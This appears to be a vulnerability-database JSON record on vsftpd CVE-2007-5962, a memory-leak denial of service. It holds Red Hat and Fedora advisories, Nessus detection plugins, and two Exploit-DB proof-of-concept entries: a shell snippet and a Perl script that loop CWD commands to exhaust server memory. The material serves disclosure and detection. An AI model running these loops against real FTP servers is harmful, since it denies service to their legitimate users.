[{"lastseen": "2019-08-13T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5962"], "description": "The vsftpd package includes a Very Secure File Transfer Protocol (FTP)\r\ndaemon.\r\n\r\nA memory leak was discovered in the vsftpd daemon. An attacker who is able\r\nto connect to an FTP service, either as an authenticated or anonymous user,\r\ncould cause vsftpd to allocate all available memory if the \"deny_file\"\r\noption was enabled in vsftpd.conf. (CVE-2007-5962)\r\n\r\nAs well, this updated package fixes following bugs:\r\n\r\n* a race condition could occur even when the \"lock_upload_files\" option is\r\nset. When uploading two files simultaneously, the result was a combination\r\nof the two files. This resulted in uploaded files becoming corrupted. In\r\nthese updated packages, uploading two files simultaneously will result in a\r\nfile that is identical to the last uploaded file.\r\n\r\n* when the \"userlist_enable\" option is used, failed log in attempts as a\r\nresult of the user not being in the list of allowed users, or being in the\r\nlist of denied users, will not be logged. In these updated packages, a new\r\n\"userlist_log=YES\" option can be configured in vsftpd.conf, which will log\r\nfailed log in attempts in these situations.\r\n\r\n* vsftpd did not support usernames that started with an underscore or a\r\nperiod character. Usernames starting with an underscore or a period are\r\nsupported in these updated packages.\r\n\r\n* using wildcards in conjunction with the \"ls\" command did not return all\r\nthe file names it should. For example, if you FTPed into a directory\r\ncontaining three files -- A1, A21 and A11 -- and ran the \"ls *1\" command,\r\nonly the file names A1 and A21 were returned. These updated packages use\r\ngreedier code that continues to speculatively scan for items even after\r\nmatches have been found.\r\n\r\n* when the \"user_config_dir\" option is enabled in vsftpd.conf, and the\r\nuser-specific configuration file did not exist, the following error\r\noccurred after a user entered their password during the log in process:\r\n\r\n500 OOPS: reading non-root config file\r\n\r\nThis has been resolved in this updated package.\r\n\r\nAll vsftpd users are advised to upgrade to this updated package, which\r\nresolves these issues.", "modified": "2017-09-08T12:14:40", "published": "2008-05-21T04:00:00", "id": "RHSA-2008:0295", "href": "https://access.redhat.com/errata/RHSA-2008:0295", "type": "redhat", "title": "(RHSA-2008:0295) Low: vsftpd security and bug fix update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T15:33:55", "description": "vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (1). CVE-2007-5962. Dos exploit for windows platform", "published": "2008-05-21T00:00:00", "type": "exploitdb", "title": "vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5962"], "modified": "2008-05-21T00:00:00", "id": "EDB-ID:31818", "href": "https://www.exploit-db.com/exploits/31818/", "sourceData": "source: http://www.securityfocus.com/bid/29322/info\r\n\r\n\r\nThe 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.\r\n\r\nSuccessfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. \r\n\r\n# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf\r\n# service vsftpd restart\r\n\r\n$ cat > memtest.sh <<EOF\r\n EOF\r\n#!/bin/bash\r\necho USER anonymous\r\necho PASS foo@bar.com\r\n\r\nwhile [ 1 ]; do\r\n echo CWD pub\r\n echo CWD ..\r\ndone\r\nEOF\r\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31818/"}, {"lastseen": "2016-02-03T15:34:03", "description": "vsftpd FTP Server 2.0.5 'deny_file' Option Remote Denial of Service Vulnerability (2). CVE-2007-5962. Dos exploit for windows platform", "published": "2008-05-21T00:00:00", "type": "exploitdb", "title": "vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5962"], "modified": "2008-05-21T00:00:00", "id": "EDB-ID:31819", "href": "https://www.exploit-db.com/exploits/31819/", "sourceData": "source: http://www.securityfocus.com/bid/29322/info\r\n \r\n \r\nThe 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.\r\n \r\nSuccessfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. \r\n\r\n#!/usr/bin/perl -w\r\n\r\n\r\n#######################################################################################\r\n#vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,\r\n#Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.\r\n#\r\n#Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration\r\n#option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.\r\n#\r\n#I tried to modify local exploit found at securityfocus such that we can remotely exloit\r\n#\r\n# Author shall not bear any responsibility\r\n#Author:Praveen Darshanam\r\n#Email:praveen[underscore]recker[at]sify.com\r\n#Date:07th June, 2008\r\n#\r\n#\r\n########################################################################################\r\n\r\n\r\nuse Net::FTP;\r\n$ftp=Net::FTP->new(\"$ARGV[0]\",Debug=>0) || die \"Cannot connect to Host $ARGV[0]\\n Usage: $perl script_name.pl target_ip\\n\";\r\n$ftp -> login(\"anonymous\",\"anonymous\") || die \"Could not Login...Retry\";\r\n\r\nwhile(1)\r\n{\r\n#this loop runs infinitely\r\n\r\n $ftp -> cwd();\r\n}\r\n\r\n$ftp->quit;\r\n\r\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31819/"}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5962"], "description": "vsftpd is a Very Secure FTP daemon. It was written completely from scratch. ", "modified": "2008-05-22T20:38:34", "published": "2008-05-22T20:38:34", "id": "FEDORA:M4MKCLJN010654", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: vsftpd-2.0.5-17.fc7", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5962"], "description": "vsftpd is a Very Secure FTP daemon. It was written completely from scratch. ", "modified": "2008-05-22T20:37:36", "published": "2008-05-22T20:37:36", "id": "FEDORA:M4MKBLC4010485", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: vsftpd-2.0.5-20.fc8", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5962"], "description": "vsftpd is a Very Secure FTP daemon. It was written completely from scratch. ", "modified": "2008-05-22T20:38:14", "published": "2008-05-22T20:38:14", "id": "FEDORA:M4MKBR8P010583", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: vsftpd-2.0.6-4.fc9", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:06:08", "description": "An updated vsftpd package that fixes a security issue and several bugs\nis now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having low security impact by the Red\nHat Security Response Team.\n\nThe vsftpd package includes a Very Secure File Transfer Protocol (FTP)\ndaemon.\n\nA memory leak was discovered in the vsftpd daemon. An attacker who is\nable to connect to an FTP service, either as an authenticated or\nanonymous user, could cause vsftpd to allocate all available memory if\nthe 'deny_file' option was enabled in vsftpd.conf. (CVE-2007-5962)\n\nAs well, this updated package fixes following bugs :\n\n* a race condition could occur even when the 'lock_upload_files'\noption is set. When uploading two files simultaneously, the result was\na combination of the two files. This resulted in uploaded files\nbecoming corrupted. In these updated packages, uploading two files\nsimultaneously will result in a file that is identical to the last\nuploaded file.\n\n* when the 'userlist_enable' option is used, failed log in attempts as\na result of the user not being in the list of allowed users, or being\nin the list of denied users, will not be logged. In these updated\npackages, a new 'userlist_log=YES' option can be configured in\nvsftpd.conf, which will log failed log in attempts in these\nsituations.\n\n* vsftpd did not support usernames that started with an underscore or\na period character. Usernames starting with an underscore or a period\nare supported in these updated packages.\n\n* using wildcards in conjunction with the 'ls' command did not return\nall the file names it should. For example, if you FTPed into a\ndirectory containing three files -- A1, A21 and A11 -- and ran the 'ls\n*1' command, only the file names A1 and A21 were returned. These\nupdated packages use greedier code that continues to speculatively\nscan for items even after matches have been found.\n\n* when the 'user_config_dir' option is enabled in vsftpd.conf, and the\nuser-specific configuration file did not exist, the following error\noccurred after a user entered their password during the log in \nprocess :\n\n500 OOPS: reading non-root config file\n\nThis has been resolved in this updated package.\n\nAll vsftpd users are advised to upgrade to this updated package, which\nresolves these issues.", "edition": 28, "published": "2008-05-22T00:00:00", "title": "RHEL 5 : vsftpd (RHSA-2008:0295)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "modified": "2008-05-22T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:vsftpd"], "id": "REDHAT-RHSA-2008-0295.NASL", "href": "https://www.tenable.com/plugins/nessus/32422", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0295. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(32422);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-5962\");\n script_bugtraq_id(29322);\n script_xref(name:\"RHSA\", value:\"2008:0295\");\n\n script_name(english:\"RHEL 5 : vsftpd (RHSA-2008:0295)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated vsftpd package that fixes a security issue and several bugs\nis now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having low security impact by the Red\nHat Security Response Team.\n\nThe vsftpd package includes a Very Secure File Transfer Protocol (FTP)\ndaemon.\n\nA memory leak was discovered in the vsftpd daemon. An attacker who is\nable to connect to an FTP service, either as an authenticated or\nanonymous user, could cause vsftpd to allocate all available memory if\nthe 'deny_file' option was enabled in vsftpd.conf. (CVE-2007-5962)\n\nAs well, this updated package fixes following bugs :\n\n* a race condition could occur even when the 'lock_upload_files'\noption is set. When uploading two files simultaneously, the result was\na combination of the two files. This resulted in uploaded files\nbecoming corrupted. In these updated packages, uploading two files\nsimultaneously will result in a file that is identical to the last\nuploaded file.\n\n* when the 'userlist_enable' option is used, failed log in attempts as\na result of the user not being in the list of allowed users, or being\nin the list of denied users, will not be logged. In these updated\npackages, a new 'userlist_log=YES' option can be configured in\nvsftpd.conf, which will log failed log in attempts in these\nsituations.\n\n* vsftpd did not support usernames that started with an underscore or\na period character. Usernames starting with an underscore or a period\nare supported in these updated packages.\n\n* using wildcards in conjunction with the 'ls' command did not return\nall the file names it should. For example, if you FTPed into a\ndirectory containing three files -- A1, A21 and A11 -- and ran the 'ls\n*1' command, only the file names A1 and A21 were returned. These\nupdated packages use greedier code that continues to speculatively\nscan for items even after matches have been found.\n\n* when the 'user_config_dir' option is enabled in vsftpd.conf, and the\nuser-specific configuration file did not exist, the following error\noccurred after a user entered their password during the log in \nprocess :\n\n500 OOPS: reading non-root config file\n\nThis has been resolved in this updated package.\n\nAll vsftpd users are advised to upgrade to this updated package, which\nresolves these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-5962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0295\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected vsftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:vsftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0295\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"vsftpd-2.0.5-12.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"vsftpd-2.0.5-12.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"vsftpd-2.0.5-12.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vsftpd\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:43:56", "description": "A memory leak was discovered in the vsftpd daemon. An attacker who is\nable to connect to an FTP service, either as an authenticated or\nanonymous user, could cause vsftpd to allocate all available memory if\nthe 'deny_file' option was enabled in vsftpd.conf. (CVE-2007-5962)\n\nAs well, this updated package fixes following bugs :\n\n - a race condition could occur even when the\n 'lock_upload_files' option is set. When uploading two\n files simultaneously, the result was a combination of\n the two files. This resulted in uploaded files becoming\n corrupted. In these updated packages, uploading two\n files simultaneously will result in a file that is\n identical to the last uploaded file.\n\n - when the 'userlist_enable' option is used, failed log in\n attempts as a result of the user not being in the list\n of allowed users, or being in the list of denied users,\n will not be logged. In these updated packages, a new\n 'userlist_log=YES' option can be configured in\n vsftpd.conf, which will log failed log in attempts in\n these situations.\n\n - vsftpd did not support usernames that started with an\n underscore or a period character. Usernames starting\n with an underscore or a period are supported in these\n updated packages.\n\n - using wildcards in conjunction with the 'ls' command did\n not return all the file names it should. For example, if\n you FTPed into a directory containing three files -- A1,\n A21 and A11 -- and ran the 'ls *1' command, only the\n file names A1 and A21 were returned. These updated\n packages use greedier code that continues to\n speculatively scan for items even after matches have\n been found.\n\n - when the 'user_config_dir' option is enabled in\n vsftpd.conf, and the user-specific configuration file\n did not exist, the following error occurred after a user\n entered their password during the log in process :\n\n500 OOPS: reading non-root config file\n\nThis has been resolved in this updated package.", "edition": 25, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : vsftpd on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080521_VSFTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60409", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60409);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-5962\");\n\n script_name(english:\"Scientific Linux Security Update : vsftpd on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Scientific Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory leak was discovered in the vsftpd daemon. An attacker who is\nable to connect to an FTP service, either as an authenticated or\nanonymous user, could cause vsftpd to allocate all available memory if\nthe 'deny_file' option was enabled in vsftpd.conf. (CVE-2007-5962)\n\nAs well, this updated package fixes following bugs :\n\n - a race condition could occur even when the\n 'lock_upload_files' option is set. When uploading two\n files simultaneously, the result was a combination of\n the two files. This resulted in uploaded files becoming\n corrupted. In these updated packages, uploading two\n files simultaneously will result in a file that is\n identical to the last uploaded file.\n\n - when the 'userlist_enable' option is used, failed log in\n attempts as a result of the user not being in the list\n of allowed users, or being in the list of denied users,\n will not be logged. In these updated packages, a new\n 'userlist_log=YES' option can be configured in\n vsftpd.conf, which will log failed log in attempts in\n these situations.\n\n - vsftpd did not support usernames that started with an\n underscore or a period character. Usernames starting\n with an underscore or a period are supported in these\n updated packages.\n\n - using wildcards in conjunction with the 'ls' command did\n not return all the file names it should. For example, if\n you FTPed into a directory containing three files -- A1,\n A21 and A11 -- and ran the 'ls *1' command, only the\n file names A1 and A21 were returned. These updated\n packages use greedier code that continues to\n speculatively scan for items even after matches have\n been found.\n\n - when the 'user_config_dir' option is enabled in\n vsftpd.conf, and the user-specific configuration file\n did not exist, the following error occurred after a user\n entered their password during the log in process :\n\n500 OOPS: reading non-root config file\n\nThis has been resolved in this updated package.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0805&L=scientific-linux-errata&T=0&P=1704\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6aa1a87\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected vsftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"vsftpd-2.0.5-12.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:06:32", "description": " - Wed May 21 2008 Martin Nagy <mnagy at redhat.com> -\n 2.0.6-4\n\n - fix a small memory leak (#397011)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-05-23T00:00:00", "title": "Fedora 9 : vsftpd-2.0.6-4.fc9 (2008-4362)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "modified": "2008-05-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:9", "p-cpe:/a:fedoraproject:fedora:vsftpd"], "id": "FEDORA_2008-4362.NASL", "href": "https://www.tenable.com/plugins/nessus/32437", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-4362.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(32437);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-5962\");\n script_bugtraq_id(29322);\n script_xref(name:\"FEDORA\", value:\"2008-4362\");\n\n script_name(english:\"Fedora 9 : vsftpd-2.0.6-4.fc9 (2008-4362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Wed May 21 2008 Martin Nagy <mnagy at redhat.com> -\n 2.0.6-4\n\n - fix a small memory leak (#397011)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=397011\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-May/010343.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7655aa9a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected vsftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:vsftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"vsftpd-2.0.6-4.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vsftpd\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:06:32", "description": " - Wed May 21 2008 Martin Nagy <mnagy at redhat.com> -\n 2.0.5-20\n\n - fix a small memory leak (#397011)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-05-23T00:00:00", "title": "Fedora 8 : vsftpd-2.0.5-20.fc8 (2008-4347)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5962"], "modified": "2008-05-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:vsftpd"], "id": "FEDORA_2008-4347.NASL", "href": "https://www.tenable.com/plugins/nessus/32436", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-4347.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(32436);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-5962\");\n script_bugtraq_id(29322);\n script_xref(name:\"FEDORA\", value:\"2008-4347\");\n\n script_name(english:\"Fedora 8 : vsftpd-2.0.5-20.fc8 (2008-4347)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Wed May 21 2008 Martin Nagy <mnagy at redhat.com> -\n 2.0.5-20\n\n - fix a small memory leak (#397011)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=397011\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-May/010333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d8c9a3c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected vsftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n 